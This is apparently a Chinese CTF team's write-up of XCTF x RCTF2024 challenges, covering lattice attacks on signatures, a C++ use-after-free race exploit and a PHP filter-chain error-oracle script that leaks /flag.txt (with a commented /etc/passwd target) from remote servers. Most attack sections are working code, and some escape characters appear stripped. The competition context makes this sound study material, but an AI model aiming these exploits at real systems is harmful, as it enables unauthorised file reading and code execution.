-联合战队|共同成长-
Cain:招新Pwn和Re手
Misc-Logo: 2024
尝试用每个字符代替连续的符号,将换行特殊标注
x='''x<!!!ex$#"'+!"!"*+3(-&x$#"+)/*3&2#x$#('(%:$-$,$"x$#+%&$+#.$,$3x#$-$%$+$-$,$3x#$.#$$-#-#-$3x#$.$#$-$,#.%1x#$.$##/#,#/&/x#$.#$#/#,#1&-x#$-$$#/#+$4&*x#$,$%#/#+$6%)x#$$+&#.$+$8%'x#$$)($-$+$:$&x#$)$)#-#,$:$&x#$*$($+#-$:$&x#$+$($)$-$-$)$&x#$,#)%&#,'/%$%'x##.!+),2)+)x$!?"N$,x'''
logo = '#' * 100 + (lambda x: (lambda f, x: f(f, x))(lambda f, x: x and ((x[0] == 'x') * 'n' or '# '[len(x)%2] * (ord(x[0])-32)) + f(f, x[1:]), x))(x) + '#' * 100
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
Crypto-Hello, XCTF!
考虑把所有字符都减去一个值,转化成小量
for i in b'xctfXCTF':
print(i, chr(i), [j-i for j in b'xctfXCTF'])
'''
120 x [0, -21, -4, -18, -32, -53, -36, -50]
99 c [21, 0, 17, 3, -11, -32, -15, -29]
116 t [4, -17, 0, -14, -28, -49, -32, -46]
102 f [18, -3, 14, 0, -14, -35, -18, -32]
88 X [32, 11, 28, 14, 0, -21, -4, -18]
67 C [53, 32, 49, 35, 21, 0, 17, 3]
84 T [36, 15, 32, 18, 4, -17, 0, -14]
70 F [50, 29, 46, 32, 18, -3, 14, 0]
减去一个f效果很好,可以取{-14, 0, 14} or {-18, 0, 18}
'''
比如我减去b'f'之后,只考虑取{-14, 0, 14}的情况,然后整个式子乘以14^-1 mod p就转化成了01向量求解
然后用BKZ去解
from Crypto.Util.number import bytes_to_long as b2l, getPrime
from sage.all import *
while True:
p = getPrime(100)
c = ZZ((b2l(b'hello') - b2l(b'$') - sum([102*256^(i+1) % p for i in range(64)])) % p)
K = 2^100
L = block_matrix(ZZ, [
[1, K*matrix(ZZ, [ZZ(256^(i+1)*14 % p) for i in range(64)]).T, 0],
[0, K*p, 0],
[0, K*c, 1]
]).BKZ(block_size=36)
for row in L:
if abs(row[-1]) == 1 and row[-2] == 0:
ans = row[:-2]
if set(ans) == set({-1, 0, 1}):
print(set(ans))
print(ans)
print(p)
# print([_.nbits() for _ in ans])
print("not this time")
找到一个解是这样的
from Crypto.Util.number import bytes_to_long as b2l, getPrime
ans = (-1, 1, -1, 0, 1, 1, -1, 0, 0, 0, 0, 1, 0, 0, 1, 1, -1, -1, 0, 1, 0, 0, -1, 0, 0, 1, 0, 0, 1, 1, 1, 1, -1, -1, 0, 1, 0, 1, 0, 0, 0, -1, 0, 0, 0, 0, -1, 1, 0, -1, 1, 0, -1, -1, 0, -1, 0, 0, 1, 1, -1, 1, 1, -1)
p = 792444903172480736339328615467
hello = bytes([(ans[i]*14+102) for i in range(64)])[::-1].decode()
print(b2l(f"{hello}$".encode()) % p, b2l(b'hello'))
print(hello)
Crypto-D³
fac = [2, 3, 3, 7, 79, 2731, 4057, 8191, 121369, 22366891, 6740339310641, 10030854869257, 4929910764223610387, 4966300248405749059, 18526238646011086732742614043, 3340762283952395329506327023033, 167510000247425697384594847173622455701743569339841261429683667, 8342680841093063014359532631803433656669591074421858694040109486076573471951766107416262860801]
rctf_exp = 351111940402796075728379920075981393284761128699669252487168127261196632432619068618571244770327218791250222421623815151677323767215657465806342637967722899175327916845440400930277772658683777577056802640791026892262013051450122815378736544025053197584668966180832613749896964723593195907881555331297312765
print(rctf_exp == 2^1015-3)
print(prod(fac) == rctf_exp + 1)
def get_qs(t):
fac = [2, 3, 3, 7, 79, 2731, 4057, 8191, 121369, 22366891, 6740339310641, 10030854869257, 4929910764223610387, 4966300248405749059, 18526238646011086732742614043, 3340762283952395329506327023033, 167510000247425697384594847173622455701743569339841261429683667, 8342680841093063014359532631803433656669591074421858694040109486076573471951766107416262860801]
fac = fac[2:]
qs = set()
# q = 2*prod(rs) + 1
import itertools, tqdm
for i in range(t):
for rs in tqdm.tqdm(itertools.combinations(fac, int(i+1))):
q = 2*prod(rs) + 1
if is_prime(q) and q.nbits() < 1024:
qs.add(q)
print(len(qs))
qs = sorted(list(qs))
return qs
qs = get_qs(10)
is_lucky_prime = (
lambda num: isPrime(num)
and num.bit_length() == P_SIZE
and bin(int.from_bytes(sha256(str(num).encode()).digest(), "big")).endswith(
"0" * DIFFICULTY
)
and GCD(num - 1, e) == 1
)
def dfs(ind, res):
for k in range(1, 4):
p = 2^k*res + 1
if is_prime(p) and p.nbits() == 1024:
print("prime", pow(e, t+1, p-1), p)
if is_lucky_prime(int(p)):
print("lucky")
return
for i in range(ind, len(qs)):
now = res * qs[i]
if now.nbits() > 1024:break
dfs(i+1, now)
dfs(0, 1)
'''
p1 = 168312142677725750367044818506464853221501973359637068899337864593789734337930832127218753252601579479619754024424538435698690189358097728253658473189138983012957954574380246327072566998358272732420350181004301003028682435470474514344936307741432964104759484827720936023897939287801141235396023635511537498167
p2 = 102391737224294102267645035476586812633757754295389575058582673253840471906926827577899604818119403719761970122309481400224059448181653971301486918281305433804858356369828191223960728889673157973545072351217238178470280420847474853138355453101118450562015319343664086575926470611914284698319447585936189861343
'''
from pwn import *
e = 3
rctf_exp = 351111940402796075728379920075981393284761128699669252487168127261196632432619068618571244770327218791250222421623815151677323767215657465806342637967722899175327916845440400930277772658683777577056802640791026892262013051450122815378736544025053197584668966180832613749896964723593195907881555331297312765
t = rctf_exp
p1 = 168312142677725750367044818506464853221501973359637068899337864593789734337930832127218753252601579479619754024424538435698690189358097728253658473189138983012957954574380246327072566998358272732420350181004301003028682435470474514344936307741432964104759484827720936023897939287801141235396023635511537498167
p2 = 102391737224294102267645035476586812633757754295389575058582673253840471906926827577899604818119403719761970122309481400224059448181653971301486918281305433804858356369828191223960728889673157973545072351217238178470280420847474853138355453101118450562015319343664086575926470611914284698319447585936189861343
print(pow(e, t+1, p1-1))
print(pow(e, t+1, p2-1))
host, port = '121.37.167.239 10088'.split()
while True:
io = remote(host, port)
io.sendlineafter(b'p (1024-bit lucky prime): ', str(p1).encode())
io.sendlineafter(b'q (1024-bit lucky prime): ', str(p2).encode())
print(io.recvline())
io.close()
Pwn-TaskGo
c++,第一次见这种任务调度的,不知道攻击点在不在里面
先看看主要的ctfmain部分吧
在magic中输入1337,可以进入MagicHeld::Gods。可以泄露system地址
BackDoor看起来是以文件名为参数,读出内容
似乎需要控制player中的scroll结构体
这里有一个条件竞争,可以对money整数溢出
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
sla('tell me your name:',b'a')
sl(str(1))
sl(str(3))
sl(str(2))
sl(str(1))
sl(str(1))
把所有scroll买了,然后学习,进入god
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
sla('tell me your name:',b'a')
sl(str(1))
sl(str(3))
sl(str(2))
sl(str(1))
sl(str(1))
sl(str(3))
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(2))
sl(str(2))
sl(str(1))
sl(str(2))
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(2))
sl(str(2))
sl(str(1))
sl(str(3))
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(1337))
gift是后门地址,,感觉接下来是对NoteStar进行操作。
在god启动时会停5秒,依然是条件竞争
这时把scroll释放,然后在NoteStar会申请回这块内存,然后写入backdoor地址,就可以执行
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
from pwn import *
context.arch='amd64'
context.os='linux'
context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
choice=0
if choice==1:
p=process('./11')
else:
p=remote("1.94.107.129",10088)
s = lambda data :p.send(data)
sl = lambda data :p.sendline(data)
sa = lambda x,data :p.sendafter(x, data)
sla = lambda x,data :p.sendlineafter(x, data)
r = lambda num=4096 :p.recv(num)
rl = lambda num=4096 :p.recvline(num)
ru = lambda x :p.recvuntil(x)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'x00'))
uu64 = lambda data :u64(data.ljust(8,b'x00'))
uru64 = lambda :uu64(ru('x7f')[-6:])
leak = lambda name :log.success('{} = {}'.format(name, hex(eval(name))))
libc_os = lambda x :libc_base + x
libc_sym = lambda x :libc_os(libc.sym[x])
def get_sb():
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))
def debug(cmd=''):
gdb.attach(p,cmd)
pause()
# debug('b BackDoor')
sla('tell me your name:',b'/flag')
sl(str(1))
sl(str(3))
sl(str(2))
sl(str(1))
sl(str(1))
sl(str(3))
ru('money you have is ')
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(2))
sl(str(2))
sl(str(1))
sl(str(2))
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(2))
sl(str(2))
sl(str(1))
sl(str(3))
sl(str(2))
sl(str(3))
sl(str(2))
sl(str(1337))
sla('realm!!!',str(3))
ru('gift: ')
backdoor=int(r(14),16)
leak('backdoor')
sl(str(3))
sl(str(2))
sl(str(1337))
sl(str(2))
sl(str(2))
sl(str(1))
sl(str(1))
sla('next visit.',str(3))
sla('Input the Comments: ',b'x00'*0x28+p64(backdoor))
p.interactive()
Crypto-SignSystem
朴素的hnp
from sage.all import *
from pwn import *
from Crypto.Util.number import *
from hashlib import sha1
def sign(msg: bytes):
io.sendlineafter(b'>', b'1')
io.sendlineafter(b"Which message to sign?: ", msg)
io.recvuntil(b'Signature: ')
r, s = eval(io.recvline().strip().decode())
return r, s
# ki = msb*2^(150+2) + mki*2^2 + lsb
# si*ki = = h + x * ri
# si*rj*ki - sj*ri*kj = h*(rj-ri)
# si*rj*2^2*mki - sj*ri*2^2*mkj + (si*rj - sj*ri)*() - h*(rj-ri) = 0 mod q
def crack(msb, lsb):
t = len(sigs) - 1
h = int(sha1(b'rec').hexdigest(), 16)
A = matrix(ZZ, 1, t)
B = matrix(ZZ, 1, t)
for i in range(t):
ri, si = sigs[0]
rj, sj = sigs[i + 1]
inv = inverse_mod(sj*ri*2^(ZZ(lsb).nbits()), q)
A[0, i] = ZZ((si*rj*2^(ZZ(lsb).nbits()))*inv % q)
B[0, i] = ZZ(((si*rj - sj*ri)*(msb*2^(kbits+ZZ(lsb).nbits()) + lsb) - h*(rj-ri))*inv % q)
L = block_matrix(ZZ, [
[1, A, 0],
[0, q, 0],
[0, B, q],
])
L = L.LLL()
for row in L:
# print([_.nbits() for _ in row])
if abs(row[-1]) == q:
mk0 = abs(row[0])
k0 = msb*2^(kbits+ZZ(lsb).nbits()) + mk0*2^(ZZ(lsb).nbits()) + lsb
r0, s0 = sigs[0]
x = ZZ((s0*k0-h)*inverse_mod(r0, q) % q)
# print(x)
if pow(g, x, p) == y:
return x
while True:
host, port = '121.37.182.7 10089'.split()
io = remote(host, int(port))
io.recvuntil(b'your pubKey: ')
pub = eval(io.recvline().strip().decode())
p, q, g, y = pub
h = int(sha1(b'rec').hexdigest(), 16)
kbits = 150
lbits = 2
mbits = 8
sigs = [sign(b'rec') for _ in range(19)]
import itertools, tqdm
for msb in tqdm.tqdm(itertools.product(range(2), repeat=mbits)):
msb = int(''.join(map(str, msb)), 2)
for lsb in itertools.product(range(2), repeat=lbits):
lsb = int(''.join(map(str, lsb)), 2)
ans = crack(msb, lsb)
if ans:
print(f"{p = }n{q = }n{g = }n{y = }n{h = }")
print(ans)
x = ZZ(ans)
k = 233
r = ZZ(pow(g, k, p)) % q
h = int(sha1(b"get flag").hexdigest(), 16)
s = (h+x*r)*inverse_mod(k, q)%q
print(f"{r = }n{s = }")
io.interactive()
io.close()
print("not this time")
Web-color
点完之后拿到一个压缩包
http://124.71.164.28:10088/secr3tcolor.zip
action=xEt6B2i+YJdcrJ/RG3Ie4Q==进入checkImage
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
测信道攻击
Flag RCTF{Color_Col0r_C0lor}
import requests
import sys
import time
from base64 import b64decode
"""
THE GRAND IDEA:
We can use PHP memory limit as an error oracle. Repeatedly applying the convert.iconv.L1.UCS-4LE
filter will blow up the string length by 4x every time it is used, which will quickly cause
500 error if and only if the string is non empty. So we now have an oracle that tells us if
the string is empty.
THE GRAND IDEA 2:
The dechunk filter is interesting.
https://github.com/php/php-src/blob/01b3fc03c30c6cb85038250bb5640be3a09c6a32/ext/standard/filters.c#L1724
It looks like it was implemented for something http related, but for our purposes, the interesting
behavior is that if the string contains no newlines, it will wipe the entire string if and only if
the string starts with A-Fa-f0-9, otherwise it will leave it untouched. This works perfect with our
above oracle! In fact we can verify that since the flag starts with D that the filter chain
dechunk|convert.iconv.L1.UCS-4LE|convert.iconv.L1.UCS-4LE|[...]|convert.iconv.L1.UCS-4LE
does not cause a 500 error.
THE REST:
So now we can verify if the first character is in A-Fa-f0-9. The rest of the challenge is a descent
into madness trying to figure out ways to:
- somehow get other characters not at the start of the flag file to the front
- detect more precisely which character is at the front
"""
def join(*x):
return '|'.join(x)
def err(s):
print(s)
raise ValueError
def req(s):
datas="""------WebKitFormBoundary6ggLD4mNz6woJLXM
Content-Disposition: form-data; name="image"; filename="chenxi.jpg"
Content-Type: image/jpeg
[payload]
------WebKitFormBoundary6ggLD4mNz6woJLXM
Content-Disposition: form-data; name="action";
xEt6B2i+YJdcrJ/RG3Ie4Q==
------WebKitFormBoundary6ggLD4mNz6woJLXM--
"""
headers = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary6ggLD4mNz6woJLXM"}
datas = datas.replace('[payload]',f'php://filter/{s}/resource=/flag.txt')
#print(f'php://filter/{s}/resource=/etc/passwd')
datas = datas.replace('n','rn')
res = requests.post('http://124.71.164.28:10088/final/game.php', data=datas,headers=headers).text
#print(res)
return "Allowed memory size" in res
"""
Step 1:
The second step of our exploit only works under two conditions:
- String only contains a-zA-Z0-9
- String ends with two equals signs
base64-encoding the flag file twice takes care of the first condition.
We don't know the length of the flag file, so we can't be sure that it will end with two equals
signs.
Repeated application of the convert.quoted-printable-encode will only consume additional
memory if the base64 ends with equals signs, so that's what we are going to use as an oracle here.
If the double-base64 does not end with two equals signs, we will add junk data to the start of the
flag with convert.iconv..CSISO2022KR until it does.
"""
blow_up_enc = join(*['convert.quoted-printable-encode']*1000)
blow_up_utf32 = 'convert.iconv.L1.UCS-4LE'
blow_up_inf = join(*[blow_up_utf32]*50)
header = 'convert.base64-encode|convert.base64-encode'
# Start get baseline blowup
print('Calculating blowup')
baseline_blowup = 0
for n in range(100):
payload = join(*[blow_up_utf32]*n)
if req(f'{header}|{payload}'):
baseline_blowup = n
break
else:
err('something wrong')
print(f'baseline blowup is {baseline_blowup}')
trailer = join(*[blow_up_utf32]*(baseline_blowup-1))
assert req(f'{header}|{trailer}') == False
print('detecting equals')
j = [
req(f'convert.base64-encode|convert.base64-encode|{blow_up_enc}|{trailer}'),
req(f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.base64-encode{blow_up_enc}|{trailer}'),
req(f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.iconv..CSISO2022KR|convert.base64-encode|{blow_up_enc}|{trailer}')
]
print(j)
if sum(j) != 2:
err('something wrong')
if j[0] == False:
header = f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.base64-encode'
elif j[1] == False:
header = f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.iconv..CSISO2022KRconvert.base64-encode'
elif j[2] == False:
header = f'convert.base64-encode|convert.base64-encode'
else:
err('something wrong')
print(f'j: {j}')
print(f'header: {header}')
"""
Step two:
Now we have something of the form
[a-zA-Z0-9 things]==
Here the pain begins. For a long time I was trying to find something that would allow me to strip
successive characters from the start of the string to access every character. Maybe something like
that exists but I couldn't find it. However, if you play around with filter combinations you notice
there are filters that *swap* characters:
convert.iconv.CSUNICODE.UCS-2BE, which I call r2, flips every pair of characters in a string:
abcdefgh -> badcfehg
convert.iconv.UCS-4LE.10646-1:1993, which I call r4, reverses every chunk of four characters:
abcdefgh -> dcbahgfe
This allows us to access the first four characters of the string. Can we do better? It turns out
YES, we can! Turns out that convert.iconv.CSUNICODE.CSUNICODE appends <0xff><0xfe> to the start of
the string:
abcdefgh -> <0xff><0xfe>abcdefgh
The idea being that if we now use the r4 gadget, we get something like:
ba<0xfe><0xff>fedc
And then if we apply a convert.base64-decode|convert.base64-encode, it removes the invalid
<0xfe><0xff> to get:
bafedc
And then apply the r4 again, we have swapped the f and e to the front, which were the 5th and 6th
characters of the string. There's only one problem: our r4 gadget requires that the string length
is a multiple of 4. The original base64 string will be a multiple of four by definition, so when
we apply convert.iconv.CSUNICODE.CSUNICODE it will be two more than a multiple of four, which is no
good for our r4 gadget. This is where the double equals we required in step 1 comes in! Because it
turns out, if we apply the filter
convert.quoted-printable-encode|convert.quoted-printable-encode|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7
It will turn the == into:
+---AD0-3D3D+---AD0-3D3D
And this is magic, because this corrects such that when we apply the
convert.iconv.CSUNICODE.CSUNICODE filter the resuting string is exactly a multiple of four!
Let's recap. We have a string like:
abcdefghij==
Apply the convert.quoted-printable-encode + convert.iconv.L1.utf7:
abcdefghij+---AD0-3D3D+---AD0-3D3D
Apply convert.iconv.CSUNICODE.CSUNICODE:
<0xff><0xfe>abcdefghij+---AD0-3D3D+---AD0-3D3D
Apply r4 gadget:
ba<0xfe><0xff>fedcjihg---+-0DAD3D3---+-0DAD3D3
Apply base64-decode | base64-encode, so the '-' and high bytes will disappear:
bafedcjihg+0DAD3D3+0DAD3Dw==
Then apply r4 once more:
efabijcd0+gh3DAD0+3D3DAD==wD
And here's the cute part: not only have we now accessed the 5th and 6th chars of the string, but
the string still has two equals signs in it, so we can reapply the technique as many times as we
want, to access all the characters in the string ;)
"""
flip = "convert.quoted-printable-encode|convert.quoted-printable-encode|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.CSUNICODE.CSUNICODE|convert.iconv.UCS-4LE.10646-1:1993|convert.base64-decode|convert.base64-encode"
r2 = "convert.iconv.CSUNICODE.UCS-2BE"
r4 = "convert.iconv.UCS-4LE.10646-1:1993"
def get_nth(n):
global flip, r2, r4
o = []
chunk = n // 2
if chunk % 2 == 1: o.append(r4)
o.extend([flip, r4] * (chunk // 2))
if (n % 2 == 1) ^ (chunk % 2 == 1): o.append(r2)
return join(*o)
"""
Step 3:
This is the longest but actually easiest part. We can use dechunk oracle to figure out if the first
char is 0-9A-Fa-f. So it's just a matter of finding filters which translate to or from those
chars. rot13 and string lower are helpful. There are probably a million ways to do this bit but
I just bruteforced every combination of iconv filters to find these.
Numbers are a bit trickier because iconv doesn't tend to touch them.
In the CTF you coud porbably just guess from there once you have the letters. But if you actually
want a full leak you can base64 encode a third time and use the first two letters of the resulting
string to figure out which number it is.
"""
rot1 = 'convert.iconv.437.CP930'
be = 'convert.quoted-printable-encode|convert.iconv..UTF7|convert.base64-decode|convert.base64-encode'
o = ''
def find_letter(prefix):
if not req(f'{prefix}|dechunk|{blow_up_inf}'):
# a-f A-F 0-9
if not req(f'{prefix}|{rot1}|dechunk|{blow_up_inf}'):
# a-e
for n in range(5):
if req(f'{prefix}|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
return 'edcba'[n]
break
else:
err('something wrong')
elif not req(f'{prefix}|string.tolower|{rot1}|dechunk|{blow_up_inf}'):
# A-E
for n in range(5):
if req(f'{prefix}|string.tolower|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
return 'EDCBA'[n]
break
else:
err('something wrong')
elif not req(f'{prefix}|convert.iconv.CSISO5427CYRILLIC.855|dechunk|{blow_up_inf}'):
return '*'
elif not req(f'{prefix}|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# f
return 'f'
elif not req(f'{prefix}|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# F
return 'F'
else:
err('something wrong')
elif not req(f'{prefix}|string.rot13|dechunk|{blow_up_inf}'):
# n-s N-S
if not req(f'{prefix}|string.rot13|{rot1}|dechunk|{blow_up_inf}'):
# n-r
for n in range(5):
if req(f'{prefix}|string.rot13|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
return 'rqpon'[n]
break
else:
err('something wrong')
elif not req(f'{prefix}|string.rot13|string.tolower|{rot1}|dechunk|{blow_up_inf}'):
# N-R
for n in range(5):
if req(f'{prefix}|string.rot13|string.tolower|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):
return 'RQPON'[n]
break
else:
err('something wrong')
elif not req(f'{prefix}|string.rot13|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# s
return 's'
elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# S
return 'S'
else:
err('something wrong')
elif not req(f'{prefix}|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
# i j k
if req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'k'
elif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'j'
elif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'i'
else:
err('something wrong')
elif not req(f'{prefix}|string.tolower|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
# I J K
if req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'K'
elif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'J'
elif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'I'
else:
err('something wrong')
elif not req(f'{prefix}|string.rot13|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
# v w x
if req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'x'
elif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'w'
elif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'v'
else:
err('something wrong')
elif not req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|dechunk|{blow_up_inf}'):
# V W X
if req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'X'
elif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'W'
elif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):
return 'V'
else:
err('something wrong')
elif not req(f'{prefix}|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
# Z
return 'Z'
elif not req(f'{prefix}|string.toupper|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
# z
return 'z'
elif not req(f'{prefix}|string.rot13|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
# M
return 'M'
elif not req(f'{prefix}|string.rot13|string.toupper|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):
# m
return 'm'
elif not req(f'{prefix}|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
# y
return 'y'
elif not req(f'{prefix}|string.tolower|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
# Y
return 'Y'
elif not req(f'{prefix}|string.rot13|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
# l
return 'l'
elif not req(f'{prefix}|string.tolower|string.rot13|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):
# L
return 'L'
elif not req(f'{prefix}|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
# h
return 'h'
elif not req(f'{prefix}|string.tolower|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
# H
return 'H'
elif not req(f'{prefix}|string.rot13|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
# u
return 'u'
elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):
# U
return 'U'
elif not req(f'{prefix}|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# g
return 'g'
elif not req(f'{prefix}|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# G
return 'G'
elif not req(f'{prefix}|string.rot13|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# t
return 't'
elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):
# T
return 'T'
else:
err('something wrong')
print()
for i in range(100):
prefix = f'{header}|{get_nth(i)}'
letter = find_letter(prefix)
# it's a number! check base64
if letter == '*':
prefix = f'{header}|{get_nth(i)}|convert.base64-encode'
s = find_letter(prefix)
if s == 'M':
# 0 - 3
prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'
ss = find_letter(prefix)
if ss in 'CDEFGH':
letter = '0'
elif ss in 'STUVWX':
letter = '1'
elif ss in 'ijklmn':
letter = '2'
elif ss in 'yz*':
letter = '3'
else:
err(f'bad num ({ss})')
elif s == 'N':
# 4 - 7
prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'
ss = find_letter(prefix)
if ss in 'CDEFGH':
letter = '4'
elif ss in 'STUVWX':
letter = '5'
elif ss in 'ijklmn':
letter = '6'
elif ss in 'yz*':
letter = '7'
else:
err(f'bad num ({ss})')
elif s == 'O':
# 8 - 9
prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'
ss = find_letter(prefix)
if ss in 'CDEFGH':
letter = '8'
elif ss in 'STUVWX':
letter = '9'
else:
err(f'bad num ({ss})')
else:
err('wtf')
print(end=letter)
o += letter
sys.stdout.flush()
"""
We are done!! :)
"""
print()
d = b64decode(o.encode() + b'=' * 4)
# remove KR padding
d = d.replace(b'$)C',b'')
print(b64decode(d))
Misc-s1ayth3sp1re
反编译jar
搜索3000
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
貌似是个逆向。。。
iArr = [164, 158, 95, 107, 4, 215, 108, 115, 5, 8, 25, 57, 41, 236, 231, 17, 85]
iArr2 = [246, 221, 11, 45, 127, 148, 45, 36, 70, 73, 78, 8, 98, 141, 140, 112, 40]
str1 = "".join([chr(a ^ b) for a, b in zip(iArr, iArr2)])
iArr3 = [100, 174, 197, 56]
iArr4 = [2, 256, 164, 95]
iArr4[1] = 256
str2 = "".join([chr(a ^ b) for a, b in zip(iArr3, iArr4)])
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
Crypto-SignSystem: Dilithium
算法摘要
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
关键参数(截取自源码注释)
#define SEEDBYTES 32
#define CRHBYTES 48
#define N 256
#define Q 8380417
#define D 13
#define ROOT_OF_UNITY 1753
* Name: pack_pk
*
* Description: Bit-pack public key pk = (rho, t1).
*
* Arguments: - uint8_t pk[]: output byte array
* - const uint8_t rho[]: byte array containing rho
* - const polyveck *t1: pointer to vector t1
* Name: pack_sk
*
* Description: Bit-pack secret key sk = (rho, tr, key, t0, s1, s2).
*
* Arguments: - uint8_t sk[]: output byte array
* - const uint8_t rho[]: byte array containing rho
* - const uint8_t tr[]: byte array containing tr
* - const uint8_t key[]: byte array containing key
* - const polyveck *t0: pointer to vector t0
* - const polyvecl *s1: pointer to vector s1
* - const polyveck *s2: pointer to vector s2
* Name: pack_sig
*
* Description: Bit-pack signature sig = (c, z, h).
*
* Arguments: - uint8_t sig[]: output byte array
* - const uint8_t *c: pointer to challenge hash length SEEDBYTES
* - const polyvecl *z: pointer to vector z
* - const polyveck *h: pointer to hint vector h
关于challenge的代码(即挑战c的产生
* Name: challenge
*
* Description: Implementation of H. Samples polynomial with TAU nonzero
* coefficients in {-1,1} using the output stream of
* SHAKE256(seed).
*
* Arguments: - poly *c: pointer to output polynomial
* - const uint8_t mu[]: byte array containing seed of length SEEDBYTES
patched函数的调用链
task.c(crypto_sign) -> sign.c(crypto_sign_signature) -> sign.c(polyvecl_uniform_gamma1) -> polyvec.c(poly_uniform_gamma1) -> poly.c(polyy_unpack)
版本
#if DILITHIUM_MODE == 2
#define K 4
#define L 3
#define ETA 2
#define TAU 39
#define BETA 78
#define GAMMA1 (1 << 17)
#define GAMMA2 ((Q-1)/88)
#define OMEGA 80
#TODO
已知Zq/(x^n+1)上的多项式z,y,c,s1
满足:z=y+c*s1
其中:
1.s1是[-2,+2]的值
2.y的系数均可被49整除
求解:s1
发现c也是系数很小很稀疏的polynomial,因此c*s1的值为真实值,在F7/(x^N+1)上即可还原s1的值
根据https://eprint.iacr.org/2018/821.pdf,恢复了部分私钥s1可以伪造有效签名
